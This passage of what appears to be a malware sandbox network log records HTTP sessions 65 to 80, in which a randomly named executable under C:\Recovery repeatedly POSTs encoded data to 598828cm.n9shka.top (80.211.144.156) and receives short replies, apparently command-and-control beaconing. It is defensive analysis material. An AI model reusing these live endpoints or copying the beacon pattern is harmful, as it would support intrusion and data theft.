Sep 14, 2024 12:54:08.273936033 CEST	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 00 1f 23 5d 3e 27 23 07 37 03 28 51 28 3f 22 12 29 32 08 15 2a 12 37 5f 2a 1a 3e 05 3d 03 05 18 33 2f 34 5c 33 21 32 05 27 27 33 56 23 2b 2e 5a 0c 1d 20 04 37 55 26 5c 25 2b 3e 59 27 08 22 5d 23 21 38 04 27 2b 21 5b 21 2c 3e 5d 28 01 2a 0f 2a 1f 2a 0e 29 3d 3a 41 2f 13 00 19 21 38 23 51 00 10 26 19 25 3d 25 13 21 19 3d 52 2a 22 25 13 31 35 26 13 30 38 31 05 32 06 21 58 30 23 23 5b 21 0c 2c 01 33 05 3f 15 23 20 32 08 3f 04 23 52 2b 0d 28 57 02 3e 5c 4d Data Ascii: #]>'#7(Q(?")27_>=3/4\3!2''3V#+.Z 7U&\%+>Y'"]#!8'+![!,>](**)=:A/!8#Q&%=%!=R"%15&0812!X0##[!,3?# 2?#R+(W>\M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	62831	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:07.247996092 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:07.603065014 CEST	1012	OUT	Data Raw: 56 55 59 5a 54 44 5a 58 5e 5e 56 51 56 53 54 5f 57 54 5c 5e 57 58 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VUYZTDZX^^VQVST_WT\^WXUXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%(<%Y'V"\.2!Y;'^ X%/X?)<&] :/,&F/%Z-
Sep 14, 2024 12:54:07.945045948 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:08.273821115 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP
Sep 14, 2024 12:54:08.273988008 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.4	62832	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:08.404521942 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:54:08.759407997 CEST	1012	OUT	Data Raw: 56 53 5c 5e 54 47 5a 59 5e 5e 56 51 56 5a 54 5f 57 56 5c 5f 57 5c 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VS\^TGZY^^VQVZT_WV\_W\U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&/"&-"V6$7(-Z6?8]'8(_&\0(3&%^ #%Y.,&F/%Z--
Sep 14, 2024 12:54:09.071523905 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:09.205332041 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.4	62833	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:09.325078964 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:54:09.681257963 CEST	1012	OUT	Data Raw: 56 5e 59 5f 54 48 5a 5c 5e 5e 56 51 56 5f 54 5a 57 5f 5c 55 57 50 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: V^Y_THZ\^^VQV_TZW_\UWPU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Z(Z!$"R"$])="6?$\0,_1?) %\ #)8&F/%Z-9
Sep 14, 2024 12:54:09.915621996 CEST	1012	OUT	Data Raw: 56 5e 59 5f 54 48 5a 5c 5e 5e 56 51 56 5f 54 5a 57 5f 5c 55 57 50 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: V^Y_THZ\^^VQV_TZW_\UWPU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Z(Z!$"R"$])="6?$\0,_1?) %\ #)8&F/%Z-9
Sep 14, 2024 12:54:10.228055954 CEST	1012	OUT	Data Raw: 56 5e 59 5f 54 48 5a 5c 5e 5e 56 51 56 5f 54 5a 57 5f 5c 55 57 50 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: V^Y_THZ\^^VQV_TZW_\UWPU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Z(Z!$"R"$])="6?$\0,_1?) %\ #)8&F/%Z-9
Sep 14, 2024 12:54:10.706451893 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:10.706636906 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:10.708391905 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:10.988092899 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.4	62834	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:11.125777006 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:11.478131056 CEST	1012	OUT	Data Raw: 56 54 59 5b 51 44 5f 5b 5e 5e 56 51 56 5f 54 59 57 53 5c 5c 57 5b 55 5a 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VTY[QD_[^^VQV_TYWS\\W[UZQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%]*?9X$647)Z",<]0+4\2()1%705Y/&F/%Z-9
Sep 14, 2024 12:54:11.836971045 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:11.944269896 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.4	62835	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:12.076733112 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:12.431459904 CEST	1012	OUT	Data Raw: 53 53 59 5e 54 46 5f 5e 5e 5e 56 51 56 5c 54 5e 57 56 5c 5b 57 5d 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SSY^TF_^^^VQV\T^WV\[W]UXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+<>$U!$=-5'3^#2: <2*:!05;&F/%Z-
Sep 14, 2024 12:54:12.740417004 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:12.872405052 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.4	62836	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:12.953854084 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1748 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.4	62837	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:13.001713991 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:13.353174925 CEST	1012	OUT	Data Raw: 56 56 59 5a 51 44 5a 59 5e 5e 56 51 56 58 54 53 57 52 5c 5a 57 5e 55 59 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VVYZQDZY^^VQVXTSWR\ZW^UYQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%(?"'%6[=^!,4\'41:?_(02:=\##9]/&F/%Z-%
Sep 14, 2024 12:54:13.668298960 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:13.796420097 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.4	62838	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:13.975272894 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:54:14.321974039 CEST	1012	OUT	Data Raw: 56 54 59 58 54 41 5f 5e 5e 5e 56 51 56 52 54 53 57 50 5c 5a 57 51 55 5e 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VTYXTA_^^^VQVRTSWP\ZWQU^QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<<%_'"4?=["<Y'<&0+?2)4#8&F/%Z-
Sep 14, 2024 12:54:14.690608978 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:14.778211117 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.4	62839	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:14.904592037 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:54:15.259630919 CEST	1012	OUT	Data Raw: 56 54 5c 5c 51 41 5a 5f 5e 5e 56 51 56 53 54 5a 57 50 5c 58 57 5a 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VT\\QAZ_^^VQVSTZWP\XWZU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X+Z>&.&5;=-2]"Y 0(719 ?)'W')973;&F/%Z-
Sep 14, 2024 12:54:15.725864887 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:15.725910902 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP
Sep 14, 2024 12:54:15.725940943 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.4	62840	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:15.859757900 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:54:16.212682962 CEST	1012	OUT	Data Raw: 53 50 59 5b 54 45 5a 53 5e 5e 56 51 56 5f 54 5c 57 53 5c 5c 57 5d 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SPY[TEZS^^VQV_T\WS\\W]U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%[<<=Y32T"$'(=2[5$' \%)(?)&)705,&F/%Z-9
Sep 14, 2024 12:54:16.542234898 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:16.672245979 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.4	62841	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:16.803400993 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:17.150063038 CEST	1008	OUT	Data Raw: 56 53 59 55 51 42 5a 5c 5e 5e 56 51 56 5b 54 52 57 5e 5c 5d 57 5f 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VSYUQBZ\^^VQV[TRW^\]W_U_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%[?<!_0#7)=^6+$]1$()#V29\ U9/&F/%Z-
Sep 14, 2024 12:54:17.472237110 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:17.800736904 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP
Sep 14, 2024 12:54:17.800916910 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.4	62842	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:17.934931040 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.4	62843	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:18.016719103 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1736 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:18.368782043 CEST	1736	OUT	Data Raw: 56 5f 59 59 54 47 5a 5c 5e 5e 56 51 56 5b 54 58 57 50 5c 5a 57 5e 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: V_YYTGZ\^^VQV[TXWP\ZW^U_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X?<$X>673>*!,;$(&:++Q&:)^ #2,&F/%Z-%
Sep 14, 2024 12:54:18.709918976 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:18.941698074 CEST	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 00 1f 23 17 2a 34 3c 58 23 04 06 52 28 59 29 01 3e 31 3a 15 3e 2c 05 15 2a 37 26 03 3e 03 33 18 24 3f 28 15 24 21 35 16 27 24 2f 50 22 01 2e 5a 0c 1d 20 03 21 23 07 00 26 06 0c 1c 33 0f 21 01 20 22 33 5d 25 05 2a 03 35 3f 2a 11 3c 28 36 09 2a 1f 36 0a 2a 03 0c 08 2c 03 04 51 23 38 23 51 00 10 26 50 32 10 32 05 22 37 36 0f 3e 0f 3e 03 26 26 3e 57 27 5d 3d 04 31 06 0f 5d 27 20 2c 05 36 32 33 5a 24 3c 23 17 22 33 2d 56 3c 04 23 52 2b 0d 28 57 02 3e 5c 4d Data Ascii: #4<X#R(Y)>1:>,7&>3$?($!5'$/P".Z !#&3! "3]%5?<(66,Q#8#Q&P22"76>>&&>W']=1]' ,623Z$<#"3-V<#R+(W>\M

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.4	62844	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:18.136878967 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:18.493808031 CEST	1012	OUT	Data Raw: 56 54 5c 58 54 42 5a 59 5e 5e 56 51 56 53 54 53 57 50 5c 58 57 58 55 59 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VT\XTBZY^^VQVSTSWP\XWXUYQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%\($-5Q7)=-"<4$(X1Z++%\5^7%X;,&F/%Z-
Sep 14, 2024 12:54:18.808294058 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:19.007261038 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.4	62845	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:19.146568060 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:54:19.493916988 CEST	1012	OUT	Data Raw: 56 52 59 5f 51 41 5f 58 5e 5e 56 51 56 5d 54 5d 57 5e 5c 58 57 5e 55 57 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VRY_QA_X^^VQV]T]W^\XW^UWQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&<Z93>)!4#*["^"Y'';+&:[(_42Y 3Z;<&F/%Z-1
Sep 14, 2024 12:54:19.813664913 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:20.009752989 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.4	62846	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
